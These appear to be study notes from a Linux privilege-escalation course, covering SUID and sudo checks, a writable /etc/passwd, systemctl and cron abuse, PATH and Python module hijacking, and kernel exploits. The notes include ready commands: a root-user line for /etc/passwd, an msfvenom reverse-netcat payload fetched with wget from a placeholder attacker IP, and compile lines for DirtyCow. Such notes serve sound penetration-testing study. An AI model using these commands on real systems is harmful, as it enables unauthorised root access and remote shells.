Linux Privilege Escalation - Overview
Horizontal privilege escalation - access pivot from users within the same permission scope
Vertical privilege escalation - access pivot from user with lower permissions to user with higher permissions
Sometimes horizontal privilege escalation is necessary before executing vertical escalation. For example, if user1 (your foothold) has no misconfigurations or exploitable escalations to obtain root or another more highly privileged user, then it might be necessary to horizontally escalate to user2, who happens to have an exploitable binary with a SUID bit or a cronjob running with root permissions.
Ie. low privilege 1 -> low privilege 2 -> high privilege
Useful Tools/Resources
Informational Resources:
- PayloadsAllTheThings - Privilege Escalation Overview
- Total OSCP Guide
- A guide to Linux Privilege Escalation
PrivEsc Automation, Scripts, and General Resources:
Commands Relevant to PrivEsc
ls -lah
find . -type f -perm /4000 or /2000 2>/dev/null
sudo -l
find . -writable 2>/dev/null
vim --> :!shSUID/SGID
find . -user root -perm /x0004000is the permission flag for SUID2000is the permission flag for SGID
Writable /etc/passwd
Format of /etc/passwd:
user:password_hash:UID:GID:root:/root:/bin/bashSince the passwords are not stored in plaintext, they first need to be hashed using openssl:
openssl passwd -1 -salt [thesalt] [thepassword]The line to write into /etc/passwd, with user "new" and password "123":
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bashSystemctl Exploitation
Systemctl is a part of the linux filesystem which interacts with systemd and is responsible for services. Systemctl is sometimes misconfigured, and can be exploited if it has SUID or SUDO privileges.
Find SUID systemctl:
find . -user root -perm /4000Exploit (from GTFOBins):
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TFThis creates a temporary service file in /tmp directory. After writing the service configuration:
./systemctl link $TF
./systemctl enable --now $TFExample to read root flag:
ExecStart=/bin/sh -c "cp /root/root.txt /tmp/rootflag.txt"Crontab Exploitation
Cronjobs are automated tasks within a Linux system. If a cronjob is run with root privileges and we can write to it, we can leverage these permissions.
Check crontab:
cat /etc/crontabFormat:
# m h dom mon dow user commandCreate payload:
msfvenom -p cmd/unix/reverse_netcat lhost=[ip] lport=[port] R > payload_nameHost payload on local webserver:
python3 -m http.server 80Download payload on target:
cd /tmp
wget http://[ip]/payload_nameWrite payload to cronjob:
echo payload > /Documents/scanner.shPATH Variable Exploitation
Privilege escalation via exploiting the path variable happens when an attacker can create an "evil twin" of the actual binary and redirect that binary to a malicious imitation.
Check PATH:
echo $PATHFind writable directories:
find / -writable -type dCreate imitation binary:
echo "/bin/bash" > ls
chmod +x lsExport to path:
export PATH=/tmp:$PATHNow when the targeted script runs 'ls', it will execute our payload instead.
Python Module Hijacking
When python scripts are owned by a higher-privileged user and have import statements, these imports can be exploited by creating a directory and file with the same name used in the import statement.
This works because python will check locally for modules before checking in other locations.
Kernel Exploits
Kernel exploits are exploits in which native features or functions are abused with the purpose of escalating privileges.
Check kernel version:
uname -aCommon kernel exploits include:
- PwnKit
- DirtyCow / DirtyCow2
- Sudo Baron / Sudo Baron 2
- American Sign Language
- Half Nelson / Half Nelson 2
Cross-compilation for 32-bit:
gcc exploit.c -mtune=i686 -m32 -o exploitExample for dirtycow 64bit:
gcc dirtycow2.c -pthread -Wall -lcrypt -o dc64